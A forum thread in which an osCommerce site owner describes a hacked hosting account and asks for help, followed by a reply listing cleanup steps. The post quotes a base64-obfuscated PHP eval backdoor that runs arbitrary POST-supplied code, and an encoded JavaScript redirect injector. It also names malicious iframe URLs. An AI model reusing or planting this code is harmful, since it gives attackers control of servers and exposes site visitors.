I was looking through making some edits on some php files on my hosted oscommerce. In the html folder I found strangely named folders like admissible evidence, adultery, bail, script etc etc. in this html folder is also two images, named streaming superstintial and tax exempt property, these images are viagra ads once they are opened, in jpg format. I also noticed all of my index.php files had iframe commands with url's like http://4analytics.ws/in.cgi?8 ihrhrhrhereo.cn/in.cgi?2 as well as some others. There was also a strange cuckoo.asp file with what appeared to be a 404 page? Then a php file with the following < ?PHP eval(base64_decode("aWYoaXNzZXQoJF9HRVRbInBhcnQiXSkpIHsgaWYoJF9HRVRbInBhcnQiXT09InNlYyIpIGVjaG8gInBhcnRnb29kIjsgfQplbHNlIGlmKGlzc2V0KCRfUE9TVFsibWFpbiJdKSkgZXZhbCh1cmxkZWNvZGUoJF9QT1NUWyJtYWluIl0pKTs=")); ?> PHP: then another php file named political-esquire.php with this <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%297Glxqp%297I%294E%297Glieh%297I%294E%297Gwgvmtx%2964perkyeki%297H%2966NezeWgvmtx525%2966%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%297I%294Epsgexmsr2vitpegi%296%3C%2966lxxt%297E33%7B%7B%7B2py%7C1tlevqeg%7D2gsq%2966%296%3D%297F%294E%297G3wgvmtx%297I%294E%297G3lieh%297I%294E%297Gfsh%7D%297I%294E%297G3fsh%7D%297I%294E%297G3lxqp%297I4')</script> PHP: What is all this? My first thought is the images look alot like the spam email images everyone receives, was someone using my server for mal mail or spam or what? Id like to find some evidence to link a recent seo guy that was given ftp access, we found him on guru and fired him, now I see him or someone working with him may be responsible, can anyone help?
Yeah I noticed some similiar ugly junk on my server. 1. Change all passwords to your server, if you ever sent out passwords for you server via email or anything else delete all traces and change passwords on those accounts as welll. 2. Search your files for other code like this and remove it. 3. Contact your hosting provider and notify them. Those are the steps I took.